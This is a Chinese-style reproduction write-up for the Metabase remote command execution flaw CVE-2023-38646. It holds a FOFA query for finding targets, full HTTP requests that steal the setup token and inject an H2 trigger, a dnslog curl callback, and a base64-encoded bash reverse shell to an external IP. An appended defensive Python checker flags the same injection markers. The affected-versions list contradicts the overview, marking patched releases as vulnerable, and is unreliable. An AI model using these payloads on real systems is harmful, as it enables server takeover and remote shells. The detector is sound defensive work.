Metabase Remote Command Execution Vulnerability (CVE-2023-38646)
1. Vulnerability overview
Metabase is an open-source data analytics platform from Metabase, Inc. (US). It is an open-source data analysis and visualization tool that lets users connect easily to a wide range of data sources, including databases, cloud services and APIs, and then query, analyze and visualize the data through an intuitive interface. Metabase before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 contain a security flaw that lets an attacker execute arbitrary commands on the server with the privileges of the Metabase process.
2. Affected versions
- Metabase open source >= 0.46.6.1
- Metabase Enterprise >= 1.46.6.1
- Metabase open source >= v0.45.4.1
- Metabase Enterprise >= v1.45.4.1
- Metabase open source >= v0.44.7.1
- Metabase Enterprise >= v1.44.7.1
- Metabase open source >= v0.43.7.2
- Metabase Enterprise >= v1.43.7.2
3. Asset discovery
- FOFA query
app="Metabase"
- Fingerprint
4. Reproduction
- Obtain the setup token
```http
GET /api/session/properties HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Host: 3.20.6.77
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
```
- Use the token obtained in the previous step
```http
POST /api/setup/validate HTTP/1.1
Host: 3.20.6.77
Connection: close
Content-Length: 241
sec-ch-ua: "Not/A)Brand";v="99", "Brave";v="115", "Chromium";v="115"
Accept: application/json
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: zh-CN,zh;q=0.5
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Cookie: metabase.DEVICE=7be0100b-9a8e-46d5-98dd-e9086e16fcf0

{
"token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl pb17no.dnslog.cn')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
```
- Reverse shell
```bash
bash -i >& /dev/tcp/172.245.154.22/7777 0>&1
```
Base64-encoded form:
```bash
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjQ1LjE1NC4yMi83Nzc3ICAwPiYx}|{base64,-d}|{bash,-i}
```
```http
POST /api/setup/validate HTTP/1.1
Host: 3.20.6.77
Connection: close
Content-Length: 241
sec-ch-ua: "Not/A)Brand";v="99", "Brave";v="115", "Chromium";v="115"
Accept: application/json
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: zh-CN,zh;q=0.5
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Cookie: metabase.DEVICE=7be0100b-9a8e-46d5-98dd-e9086e16fcf0

{
"token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjQ1LjE1NC4yMi83Nzc3ICAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
```
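A defensive companion to the reproduction steps above, added here and not part of the original write-up: it assesses offline the two artefacts those steps rely on. `assess_properties` takes a captured `/api/session/properties` response and reports the version (compared with the patch-level releases listed in the affected-versions section, which the overview describes as the fixed releases) and whether a setup token is still present in an unauthenticated response; `suspicious_validate_request` scans a `POST /api/setup/validate` body for the H2 connection-string markers the payload above uses. The response field names `version.tag` and `setup-token`, the assumption that release lines older than x.43 never received a back-port while lines newer than x.46 ship with the fix, and all sample inputs are assumptions or constructed for this example.

```python
import json
import re

# Added defensive example (not the write-up's own code). Patch-level releases
# per line, taken from the affected-versions section above; the open-source
# and Enterprise lines share patch numbers with a 0./1. prefix.
FIXED_VERSIONS = {
    "0.46": "0.46.6.1", "1.46": "1.46.6.1",
    "0.45": "0.45.4.1", "1.45": "1.45.4.1",
    "0.44": "0.44.7.1", "1.44": "1.44.7.1",
    "0.43": "0.43.7.2", "1.43": "1.43.7.2",
}


def parse_version(tag):
    """'v0.46.5' -> (0, 46, 5); tuples compare element-wise, which is what we need."""
    return tuple(int(p) for p in tag.lstrip("v").split("."))


def is_vulnerable_version(tag):
    """True when the tag is older than the patched release of its line."""
    v = parse_version(tag)
    line = f"{v[0]}.{v[1]}"
    if line in FIXED_VERSIONS:
        return v < parse_version(FIXED_VERSIONS[line])
    # Assumption (not stated on the page): lines older than x.43 never got a
    # back-port, lines newer than x.46 were released with the fix already in.
    return v[1] < 43


def assess_properties(body):
    """Assess a captured, unauthenticated /api/session/properties response.

    Assumed response shape: {"version": {"tag": "v0.46.5", ...},
    "setup-token": "<uuid, or absent>", ...}. Step one of the reproduction
    reads the setup token from exactly this endpoint, so a token present in
    an unauthenticated response of a finished install is the exposure to find.
    """
    props = json.loads(body)
    tag = props.get("version", {}).get("tag", "")
    return {
        "version": tag,
        "vulnerable_version": is_vulnerable_version(tag) if tag else None,
        "setup_token_exposed": bool(props.get("setup-token")),
    }


# Markers from the payload above that never belong in a legitimate H2 data
# source definition: a jar-internal path, an escaped ';' used to smuggle an
# extra setting past input filtering, the H2 trace setting, and trigger source.
H2_INJECTION_MARKERS = re.compile(
    r"\.jar!|\\;|TRACE_LEVEL_SYSTEM_OUT|CREATE\s+TRIGGER|//javascript|Runtime\.getRuntime\(\)",
    re.IGNORECASE,
)


def suspicious_validate_request(body):
    """Return the injection markers found in a POST /api/setup/validate body.

    An empty list means nothing suspicious was found; the request may still be
    a legitimate data-source check during first-time setup.
    """
    req = json.loads(body)
    details = req.get("details", {})
    if details.get("engine") != "h2":
        return []
    db = details.get("details", {}).get("db", "")
    return H2_INJECTION_MARKERS.findall(db)


# Constructed samples: a pre-fix instance that still exposes its setup token,
# and a patched one that does not.
SAMPLE_PROPERTIES_VULNERABLE = json.dumps({
    "version": {"tag": "v0.46.5"},
    "setup-token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
})
SAMPLE_PROPERTIES_PATCHED = json.dumps({"version": {"tag": "v0.46.6.1"}})

# Constructed request bodies: an ordinary H2 data source, and the payload above.
SAMPLE_BENIGN_BODY = json.dumps({
    "token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
    "details": {"engine": "h2", "details": {"db": "file:/data/warehouse"}},
})
SAMPLE_PAYLOAD_BODY = json.dumps({
    "token": "ad584d85-31ab-4c05-aa1f-8a0e8518a318",
    "details": {"engine": "h2", "details": {
        "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
              "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT "
              "ON INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
              "java.lang.Runtime.getRuntime().exec('curl pb17no.dnslog.cn')\n$$--=x"}},
})

if __name__ == "__main__":
    for label, body in [("vulnerable", SAMPLE_PROPERTIES_VULNERABLE),
                        ("patched", SAMPLE_PROPERTIES_PATCHED)]:
        print(label, assess_properties(body))
    for label, body in [("benign", SAMPLE_BENIGN_BODY), ("payload", SAMPLE_PAYLOAD_BODY)]:
        print(label, suspicious_validate_request(body))
```

Run it directly to see both samples; in practice, feed it response and request bodies captured at a reverse proxy or WAF. A marker hit against a completed installation is a strong signal, since setup-time data-source validation has no business happening after setup, and the durable fix remains upgrading to the patched releases listed above.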